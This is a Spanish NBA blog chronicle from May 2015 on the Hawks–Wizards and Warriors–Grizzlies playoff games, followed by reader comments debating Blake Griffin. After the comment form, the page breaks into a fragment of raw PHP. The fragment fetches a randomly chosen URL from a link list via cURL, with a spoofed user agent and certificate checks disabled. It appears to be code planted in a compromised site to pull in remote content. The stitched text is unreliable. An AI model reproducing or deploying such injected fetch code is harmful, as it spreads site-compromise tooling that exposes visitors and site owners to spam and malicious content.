La crónica: Match point

16 de May de 2015 por TheDeerHunter

Los que no hayáis visto la genial metáfora de Woody Allen en torno a una pelota de tenis y los dos lados de la red quizá no pilléis la alusión. La historia a menudo se escribe de un modo un tanto caprichoso, en el que la suerte reparte prosperidad e impunidad. Diría que pocas veces esta cuestión se pone tan evidentemente de manifiesto como cada año en los playoffs de la NBA. Jamás sabremos qué es lo que habría ocurrido de haber ejecutado Paul Pierce su increíble buzzer beater unas décimas de segundo antes. Jamás sabremos cómo hubiera discurrido todo de haberse desviado unas micras el balón que lanza Curry al final del tercer cuarto desde más allá del medio campo.

Hawks 94 – Wizards 91

Pasan los Hawks a la final de conferencia por primera vez desde 1971, pero sin haber demostrado nada. Da la sensación que la conferencia Este comienza a disputarse de verdad precisamente a partir de ahora y no es la primera vez. Sin duda se antoja una ventaja frente a sus competidores del Oeste que vienen dispuntando eliminatorias a muerte desde primera ronda, con el consiguiente desgaste mental y físico.
El caso es que los Hawks volvieron a coquetear con la derrota, a la que están tan acostumbrados esta postemporada tras una impecable regular. El bajón en prestaciones viene personalizado en Kyle Korver, quien ayer volvió a mostrarse inoperante desde la larga distancia (0 de 7), también en la aportación del banquillo, que cada día va teniendo menos peso en los planes de Budenholzer.
Los Hawks han ido perdiendo paulatinamente la confianza en el lanzamiento exterior, que facilitaba mucho su juego de pase con tanta gente abierta. Sin un ataque excesivamente fluido tampoco han terminado de ajustar la defensa, contra un rival que no es precisamente la creme de la creme ofensivamente.
Por el puro peso de su mayor calidad lograron abrir escuetas ventajas antes del descanso. Horford y Millsap volvían a imponerse a sus pares. Teague equilibraba el efecto Wall y Carroll cuajaba el mejor partido de su carrera en playoffs.
Ni por esas, Bradley Beal se echaba al equipo a sus espaldas para evitar la eliminación. Los Wizards volvían a colocar el choque en el alambre y cada posesión se antojaba vital. Una canasta de Carroll a pase de Teague a falta de un minuto y un tiro libre de Horford colocaba un +3 para los Hawks a falta de 6.4 segundos.
El resto ya lo hemos visto. Wall, bloqueado, lograba hacer llegar el balón a Paul Pierce, casi desaparecido toda la noche. El canastón es inenarrable pero el reloj dictaba su sentencia. Quizá el último no-buzzer beater de un campeonísimo como ha sido “The Truth”.

Warriors 108 – Grizzlies 95

La lógica cae por su propio peso. Los Grizzlies han plantado cara más allá de sus posibilidades al mejor equipo del momento, con el mejor jugador del momento. Sólo les faltaba a los Warriors recuperar a Iguodala para la causa en ausencia, eso sí, de Speights.
Los Warriors, con Curry tocado por los hados, comenzaron arrolladores llegando a dejar atónitos a la defensa más dura de la liga. Ante un 47% en triples poco se suele poder hacer, y menos aún ante alguno de los que “suelta” Curry que llegan a desesperar al más pintado. Ante eso… o te compras un paraguas, o te pones a llorar por las esquinas, o sencillamente te rindes… aunque también puedes apretar los dientes y sufrir como un perro. Esta última opción es la que siempre elije un grupo de espartanos como son los Grizzlies, cuya máxima virtud es que no regalarán nada (“arrebatádselo todo…”)
Es casi increíble y particularmente loable que, contra las cuerdas, lograran ir remando hasta volver a equilibrar el choque en el tercer cuarto. Ahí se desató la mala bestia que hay encerrada en el liviano cuerpo de Stephen Curry. Canastón tras canastón, asistencia tras asistencia, rechazó las embestidas de sus rivales. Como guinda en el último ataque de Memphis, le cae un balón suelto en la bombilla de su propio campo. Tal y como la atrapa la lanza… y casi resulta previsible lo que viene después. Canastón que hace cambiar la película de una hipotética diferencia de dos o tres puntos a 8, otra vez. Golpe moral para mandar a cualquiera directo a la lona.
Pelearon los Grizzlies porque va en sus genes, pero ya sin el ímpetu que habían mostrado hasta ese momento. Poco se les puede reprochar.
El mejor equipo del momento, el MVP… el mejor jugador de esta postemporada esperan rival en una final de conferencia, que desde 1976 no habían pisado.

Comenta

12 comentarios a esta entrada

  1. Albertis dice:
    #1

    Bueno, qué decir de esta serie del Oeste… creo que muchos pensábamos como yo que después del tercer partido y con 1-2 en la serie los favoritos eran los Grizzlies, se les veía un equipo mas hecho, con mas experiencia en estas lides, albergaba una ligera esperanza de que pasara lo que ha pasado pero la verdad es que no lo esperaba, (menos después de leer unas declaraciones de Kerr en las que decía que se les notaba mucho que eran prácticamente novatos a estas alturas). Los Warriors han demostrado una madurez y sobretodo creo que tienen a un técnico inteligente, con sensibilidad para detectar posibles errores y subsanarlos, o por lo menos intentarlo.
    En mi modesta opinión creo que Golden State adolece de juego interior la verdad, sé que es un equipo muy muy compensado y que tienen a Bogut, Lee, Speights (ahora no, hasta cuando??), Green, etc dentro de la zona pero yo después de ver el 1-2 en la serie tenía claro que o entraba mas en escena David Lee (porqué jugó tan poco en los primeros 3 partidos?? Estaba lesionado?) o la superioridad interior de los Grizzlies era evidente, con ello y el sonado cambio táctico en la marca de Bogut sobre Allen creo que lo compensaron de manera suficiente, eso y que a partir del 4 partido se les ha visto muy enchufados, sobre todo en defensa. Sé que tienen a dos francotiradores de point y shooting guard pero… cuando en algunos partidos no estén acertados… tendrán las suficientes armas para seguir peleándole el partido a unos supuestos Clippers o Cavs??? Tengo esa duda.
    Un saludo.

      Citar

  2. Albertis dice:
    #2

    Dicho esto…parece que solo sepa criticar a los Warriors… me parece una plantilla tremenda y lo de Curry esta última noche es de traca! Tremendo por todos lados, poco se puede decir de él a estas alturas, sólo que contagia buen rollo y optimismo.
    Ojalá se lleven el anillo!

      Citar

  3. oli dice:
    #3

    Ya tenemos al cuarto semifinalista, al final los puestos en la clasificación regular han dictado esencia y han pasado los primeros y segundos, a seguir disfrutando!!

      Citar

  4. Azabel dice:
    #4

    enorme griffin en el partido decisivo, que metio? dos puntos en el ultimo cuarto?

      Citar

  5. txusma dice:
    #5

    Azabel:
    enorme griffin en el partido decisivo, que metio? dos puntos en el ultimo cuarto?

    Pues fueron 11… En total 27 puntos, 11 rebotes y 6 asistencias.

      Citar

  6. oli dice:
    #6

    Yo no soy seguidor de los clippers pero criticarlo justo ahora es muy oportunista, creo que ha dado un gran paso adelante y todavía es muy joven

      Citar

  7. rumbero dice:
    #7

    No es que sea oportunista, es que no tiene ningún sentido. Ha sido de largo el mejor de los Clippers. Promediando 25.5 puntos, 12.7 rebotes, 6.14 asistencias en PO, números que sólo lo había hecho en postemporada un extrarrestre en esto como Oscar Robertson.

      Citar

  8. Azabel dice:
    #8

    txusma: Pues fueron 11… En total 27 puntos, 11 rebotes y 6 asistencias.

    11 en el ultimo cuarto? donde estuvieron? yo solo vi un ganchito, y en todo caso la mayoria basura

      Citar

  9. Azabel dice:
    #9

    rumbero:
    No es que sea oportunista, es que no tiene ningún sentido. Ha sido de largo el mejor de los Clippers. Promediando 25.5 puntos, 12.7 rebotes, 6.14 asistencias en PO, números que sólo lo había hecho en postemporada un extrarrestre en esto como Oscar Robertson.

    cuantos tapones promedio y cuantas perdidas y cuantos minutos? cada 36 esos numeros se reducen de forma considerrable, sus porcentajes fueron 50%, no tapono una sola vez en toda la serie, ayer perdio 5 bolas

    27 puntos tirandote 23 tiros y jugando 44 minutos me parece bastante poco…

      Citar

  10. txusma dice:
    #10

    Azabel: 11 en el ultimo cuarto? donde estuvieron? yo solo vi un ganchito, y en todo caso la mayoria basura

    Fueron 11, otra cosa es que tus ojos nos los quieran ver… 😀

      Citar

  11. Azabel dice:
    #11

    txusma: Fueron 11, otra cosa es que tus ojos nos los quieran ver…

    no tio, vi el ultimo cuarto, hasta faltando un minuto los Clippers no pudieron bajar la diferencia a menos 10, estando entre los 16 y 18 todo el ultimo cuarto, la verdad, no lo vi a Griffin ajajajaj vi mucho a Smith que le metio un ganchito en la cara, a Priginio que le saco un rebote como un niño, a Brewer y Ariza castigando de 3 y a Harden que hizo lo que quizo

    pero a Grffin no jahaja

      Citar

  12. charlestone dice:
    #12

    buff…la verdad es que Azabel te estás columpiando. Tu crítica a Griffin podía estar argumentada al comienzo pero criticarle ahora, justo cuando han perdido el séptimo, me parece bastante ventajista y oportunista…de todas formas, lo mismo decían de Lebron (que dios me libre de compararlos pero el rendimiento de Griffin ha sido extraordinario). Eso sí, los odios, las fobias y los gustos dan salsa a la vida así que a disfrutar aunque no haya por donde coger tus comentarios…jejeje.
    Ahora a por las finales de conferencia…la del este da penita

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>